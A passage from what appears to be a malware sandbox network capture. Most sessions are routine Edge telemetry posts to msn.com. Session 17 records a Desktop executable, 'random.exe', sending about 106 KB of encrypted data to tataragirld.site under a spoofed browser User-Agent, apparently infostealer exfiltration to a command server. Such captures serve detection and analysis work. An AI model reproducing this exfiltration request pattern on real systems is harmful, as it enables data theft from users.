                                                                                                                                                                                                                                                                                  Cookie: USRLOC=; MUID=035D89D9374366AE1C219CB0365A672A; _EDGE_S=F=1&SID=39D765F2EF9B679519F0709BEEE166BB; _EDGE_V=1; SM=T
                                                                                                                                                                                                                                                                                  2025-01-03 22:32:46 UTC982INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                  Cache-Control: private, no-cache, proxy-revalidate, no-store
                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                  Content-Type: image/gif
                                                                                                                                                                                                                                                                                  Last-Modified: Tue, 10 Dec 2024 13:00:24 GMT
                                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                  ETag: "9270eb7934bdb1:0"
                                                                                                                                                                                                                                                                                  Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                  X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                  P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
                                                                                                                                                                                                                                                                                  Set-Cookie: SM=C; domain=c.msn.com; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                  Set-Cookie: MUID=035D89D9374366AE1C219CB0365A672A; domain=.msn.com; expires=Wed, 28-Jan-2026 22:32:46 GMT; path=/; SameSite=None; Secure; Priority=High;
                                                                                                                                                                                                                                                                                  Set-Cookie: SRM_M=035D89D9374366AE1C219CB0365A672A; domain=c.msn.com; expires=Wed, 28-Jan-2026 22:32:46 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                  Set-Cookie: MR=0; domain=c.msn.com; expires=Fri, 10-Jan-2025 22:32:46 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                  Set-Cookie: ANONCHK=0; domain=c.msn.com; expires=Fri, 03-Jan-2025 22:42:46 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 22:32:46 GMT
                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                  Content-Length: 42
                                                                                                                                                                                                                                                                                  2025-01-03 22:32:46 UTC42INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 01 4c 00 3b
                                                                                                                                                                                                                                                                                  Data Ascii: GIF89a!,L;


                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                  13192.168.2.449821104.46.162.2244437628C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                  2025-01-03 22:32:48 UTC1026OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735943566682&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                  Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                  Content-Length: 10987
                                                                                                                                                                                                                                                                                  sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                  Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                                  Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                  Cookie: USRLOC=; MUID=035D89D9374366AE1C219CB0365A672A; _EDGE_S=F=1&SID=39D765F2EF9B679519F0709BEEE166BB; _EDGE_V=1
                                                                                                                                                                                                                                                                                  2025-01-03 22:32:48 UTC10987OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 35 2d 30 31 2d 30 33 54 32 32 3a 33 32 3a 34 36 2e 36 38 31 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 32 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 38 64 33 35 64 33 30 65 2d 63 30 65 64 2d 34 38 30 36 2d 61 64 30 32 2d 39 31 36 35 63 65 62 33 34 36 30 31 22 2c 22 65 70 6f 63 68 22 3a 22 33 34 30 39 33 34 38 31 31 32 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65
                                                                                                                                                                                                                                                                                  Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2025-01-03T22:32:46.681Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":2,"installId":"8d35d30e-c0ed-4806-ad02-9165ceb34601","epoch":"3409348112"},"app":{"locale
                                                                                                                                                                                                                                                                                  2025-01-03 22:32:48 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                  P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                  Set-Cookie: MC1=GUID=0805d5df5d96416d946ced9d33e37abe&HASH=0805&LV=202501&V=4&LU=1735943568524; Domain=.microsoft.com; Expires=Sat, 03 Jan 2026 22:32:48 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                  Set-Cookie: MS0=0ff010e938364f37b34e84b37a5de6c3; Domain=.microsoft.com; Expires=Fri, 03 Jan 2025 23:02:48 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                  time-delta-millis: 1842
                                                                                                                                                                                                                                                                                  Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                  Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                  Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 22:32:48 GMT
                                                                                                                                                                                                                                                                                  Connection: close


                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                  14192.168.2.449822104.46.162.2244437628C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                  2025-01-03 22:32:48 UTC1025OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735943566686&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                  Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                  Content-Length: 4841
                                                                                                                                                                                                                                                                                  sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                  Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                                  Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                  Cookie: USRLOC=; MUID=035D89D9374366AE1C219CB0365A672A; _EDGE_S=F=1&SID=39D765F2EF9B679519F0709BEEE166BB; _EDGE_V=1
                                                                                                                                                                                                                                                                                  2025-01-03 22:32:48 UTC4841OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 35 2d 30 31 2d 30 33 54 32 32 3a 33 32 3a 34 36 2e 36 38 35 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 33 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 38 64 33 35 64 33 30 65 2d 63 30 65 64 2d 34 38 30 36 2d 61 64 30 32 2d 39 31 36 35 63 65 62 33 34 36 30 31 22 2c 22 65 70 6f 63 68 22 3a 22 33 34 30 39 33 34 38 31 31 32 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65
                                                                                                                                                                                                                                                                                  Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2025-01-03T22:32:46.685Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":3,"installId":"8d35d30e-c0ed-4806-ad02-9165ceb34601","epoch":"3409348112"},"app":{"locale
                                                                                                                                                                                                                                                                                  2025-01-03 22:32:48 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                  P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                  Set-Cookie: MC1=GUID=788eb06d446846ff992bb32f68f21b35&HASH=788e&LV=202501&V=4&LU=1735943568528; Domain=.microsoft.com; Expires=Sat, 03 Jan 2026 22:32:48 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                  Set-Cookie: MS0=8b4d5f1861da446181abe09bfc81ec55; Domain=.microsoft.com; Expires=Fri, 03 Jan 2025 23:02:48 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                  time-delta-millis: 1842
                                                                                                                                                                                                                                                                                  Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                  Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                  Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 22:32:48 GMT
                                                                                                                                                                                                                                                                                  Connection: close


                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                  15192.168.2.449825104.46.162.2244437628C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                  2025-01-03 22:32:48 UTC1033OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735943567340&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                  Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                  Content-Length: 5429
                                                                                                                                                                                                                                                                                  sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                  Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                                  Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                  Cookie: USRLOC=; MUID=035D89D9374366AE1C219CB0365A672A; _EDGE_S=F=1&SID=39D765F2EF9B679519F0709BEEE166BB; _EDGE_V=1; msnup=
                                                                                                                                                                                                                                                                                  2025-01-03 22:32:48 UTC5429OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 35 2d 30 31 2d 30 33 54 32 32 3a 33 32 3a 34 37 2e 33 33 39 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 34 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 38 64 33 35 64 33 30 65 2d 63 30 65 64 2d 34 38 30 36 2d 61 64 30 32 2d 39 31 36 35 63 65 62 33 34 36 30 31 22 2c 22 65 70 6f 63 68 22 3a 22 33 34 30 39 33 34 38 31 31 32 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65
                                                                                                                                                                                                                                                                                  Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2025-01-03T22:32:47.339Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":4,"installId":"8d35d30e-c0ed-4806-ad02-9165ceb34601","epoch":"3409348112"},"app":{"locale
                                                                                                                                                                                                                                                                                  2025-01-03 22:32:49 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                  P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                  Set-Cookie: MC1=GUID=776f5af027c04ece924e4303bfdb8ab5&HASH=776f&LV=202501&V=4&LU=1735943569268; Domain=.microsoft.com; Expires=Sat, 03 Jan 2026 22:32:49 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                  Set-Cookie: MS0=907ad607abfb4df1b88ec876b3bc121a; Domain=.microsoft.com; Expires=Fri, 03 Jan 2025 23:02:49 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                  time-delta-millis: 1928
                                                                                                                                                                                                                                                                                  Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                  Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                  Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 22:32:49 GMT
                                                                                                                                                                                                                                                                                  Connection: close


                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                  16192.168.2.449826104.46.162.2244437628C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                  2025-01-03 22:32:49 UTC1033OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735943567716&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                  Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                  Content-Length: 9842
                                                                                                                                                                                                                                                                                  sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                  Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                                  Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                  Cookie: USRLOC=; MUID=035D89D9374366AE1C219CB0365A672A; _EDGE_S=F=1&SID=39D765F2EF9B679519F0709BEEE166BB; _EDGE_V=1; msnup=
                                                                                                                                                                                                                                                                                  2025-01-03 22:32:49 UTC9842OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 43 6f 6e 74 65 6e 74 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 35 2d 30 31 2d 30 33 54 32 32 3a 33 32 3a 34 37 2e 37 31 35 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 35 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 38 64 33 35 64 33 30 65 2d 63 30 65 64 2d 34 38 30 36 2d 61 64 30 32 2d 39 31 36 35 63 65 62 33 34 36 30 31 22 2c 22 65 70 6f 63 68 22 3a 22 33 34 30 39 33 34 38 31 31 32 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63
                                                                                                                                                                                                                                                                                  Data Ascii: {"name":"MS.News.Web.ContentView","time":"2025-01-03T22:32:47.715Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":5,"installId":"8d35d30e-c0ed-4806-ad02-9165ceb34601","epoch":"3409348112"},"app":{"loc
                                                                                                                                                                                                                                                                                  2025-01-03 22:32:49 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                  P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                  Set-Cookie: MC1=GUID=6193becf0da4491eaa5c23ed3ef1324a&HASH=6193&LV=202501&V=4&LU=1735943569768; Domain=.microsoft.com; Expires=Sat, 03 Jan 2026 22:32:49 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                  Set-Cookie: MS0=63769fa5a2324dd387de1e97997645c3; Domain=.microsoft.com; Expires=Fri, 03 Jan 2025 23:02:49 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                  time-delta-millis: 2052
                                                                                                                                                                                                                                                                                  Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                  Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                  Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 22:32:49 GMT
                                                                                                                                                                                                                                                                                  Connection: close


                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                  17192.168.2.449899188.114.96.34437560C:\Users\user\Desktop\random.exe
                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                  2025-01-03 22:33:04 UTC430OUTPOST /sagesse_renaldo00.html?tdfgozllgbxxyj=yhIP6D%2BNM98rEr1pqaSoG1KWw5J7mExVtIz1GfiNddrJjYjNZ3%2FJd4bCLu7irk2mkj7p6jPYK0UCnJWx5ekJ7g%3D%3D HTTP/1.1
                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Safari/605.1.15
                                                                                                                                                                                                                                                                                  n: 0gHlCoLSAmh/w1kHxjh3xUphMOa2Y4sQdkrr3k64NNJT0myRaJGfGrdU
                                                                                                                                                                                                                                                                                  Content-Length: 106564
                                                                                                                                                                                                                                                                                  Host: tataragirld.site
                                                                                                                                                                                                                                                                                  2025-01-03 22:33:04 UTC15331OUTData Raw: 00 00 00 00 03 00 00 00 00 00 00 00 fd ff ff ff 92 00 01 7d 00 00 00 b9 49 01 00 08 00 00 00 cc b9 90 09 10 10 10 10 bf 14 10 10 10 10 10 10 89 63 31 02 37 91 31 35 21 91 31 5d 96 c0 f4 ce ca da a3 78 96 64 a8 ba f6 da f4 f6 a8 c4 ce cc da f6 a8 92 f0 f0 98 d2 f8 d2 a8 88 ce d6 d2 c8 a8 9e ce ce de c8 da a8 96 c0 f4 ce ca da a8 ba f6 da f4 50 98 d2 f8 d2 33 23 91 31 5f 98 da dc d2 fa c8 f8 a3 68 96 64 a8 ba f6 da f4 f6 a8 c4 ce cc da f6 a8 92 f0 f0 98 d2 f8 d2 a8 88 ce d6 d2 c8 a8 9e ce ce de c8 da a8 96 c0 f4 ce ca da a8 ba f6 da f4 50 98 d2 f8 d2 a8 98 da dc d2 fa c8 f8 a3 78 d6 c0 f4 ce ca c2 fa ca ae d4 f4 ce fe f6 da f4 f6 a8 96 c0 f4 ce ca da a8 f0 f4 ce dc c2 c8 da f6 a8 98 da dc d2 fa c8 f8 a8 88 ce de c2 cc 50 98 d2 f8 d2 a3 72 d6 c0 f4 ce ca c2
                                                                                                                                                                                                                                                                                  Data Ascii: }Ic1715!1]xdP3#1_hdPxPr
                                                                                                                                                                                                                                                                                  2025-01-03 22:33:04 UTC15331OUTData Raw: 01 ba bc d7 1e bd 1a ea 18 ff 58 28 38 d2 aa 78 18 37 e5 bf fe 80 6d 94 c8 68 e4 46 c1 a1 9c 5e 63 3d aa a2 9d 73 a8 19 b0 a3 e4 b4 3c 98 3d b1 24 d2 c0 85 a4 15 84 69 71 8a f5 4b aa bc c7 38 ab ad 64 7a 6c 70 8a be be 7c 97 5a 99 fd 75 67 b7 79 10 05 ef 32 bd 1e 51 f5 cf 3f 59 a3 09 2c 20 6c 07 f8 04 52 b0 a5 c4 d9 75 23 8b 33 19 75 ae 2c 9c 68 3d d4 b6 c3 04 e6 68 d4 77 c7 24 c0 4d ac 9d f9 17 e4 84 34 f6 68 b1 97 02 06 ea 96 0f 4a 0c 8c e9 4b 2b 02 ae aa b2 db 88 e0 fa 6d 96 83 f1 f7 02 80 a9 ab 6e a0 ec f7 a5 49 0d bc 2b d2 5f 1e b0 80 ad 11 1a 19 c4 28 2a 0d 4a 97 bc 1b 88 26 e2 3f fd 3b 9e 52 45 fd d3 2e 8b 93 ad 93 17 c0 ca 57 fc de bd db 40 da a6 12 52 0e ec fd d7 96 a9 ae 17 d1 22 67 f1 e8 da 39 fa b2 d9 19 1c d4 8f d6 c0 65 d1 f2 36 25 b9 3d ab
                                                                                                                                                                                                                                                                                  Data Ascii: X(8x7mhF^c=s<=$iqK8dzlp|Zugy2Q?Y, lRu#3u,h=hw$M4hJK+mnI+_(*J&?;RE.W@R"g9e6%=
                                                                                                                                                                                                                                                                                  2025-01-03 22:33:04 UTC15331OUTData Raw: 1f 46 d9 b1 eb 03 a2 51 9f 0f 5b fd bc ba 81 db 84 10 54 93 4f 09 5a 07 a5 41 2e 28 c3 41 7b 5d c8 ae 42 bc b6 ee 9d ed c4 6c 6c 93 73 dc e6 87 46 29 a4 42 11 cb c4 10 c6 ee 86 6b 5e 1c 6c 3a 65 b7 3b 7b 5d 3b cf e4 d1 5c 61 47 86 41 a9 fa b7 f2 4e b8 97 c4 81 60 92 8c 94 62 c7 17 f5 13 1e 42 89 8f 46 48 86 5b 92 4a be 5f f7 80 59 7e 34 94 1c 39 8c b7 a0 e8 66 e5 72 68 5e 5e cd d6 52 f3 55 6a d4 36 6d c6 c1 e2 0d 6e 1d fe 76 1c ab b1 cf 63 f9 fa 8e b1 7d e0 d9 0a b5 95 9f 78 c5 2a 35 9d 87 11 8c 03 e3 db 5d 1f 8c c3 63 bc 6b 90 78 fe 13 75 6b 80 68 fe 64 5b 12 df 90 40 04 be 6a a7 4b cf 88 1a f2 50 9e 56 05 0c 7d c9 8d ba 38 73 59 7a fe 70 27 57 7b 68 43 ac 8e a3 c8 38 12 23 f2 f6 ad d9 96 3e df 31 74 7c 5c 13 e8 f2 05 33 dc 4d bf 8b 14 6a 14 1f 24 99 3d
                                                                                                                                                                                                                                                                                  Data Ascii: FQ[TOZA.(A{]BllsF)Bk^l:e;{];\aGAN`bBFH[J_Y~49frh^^RUj6mnvc}x*5]ckxukhd[@jKPV}8sYzp'W{hC8#>1t|\3Mj$=
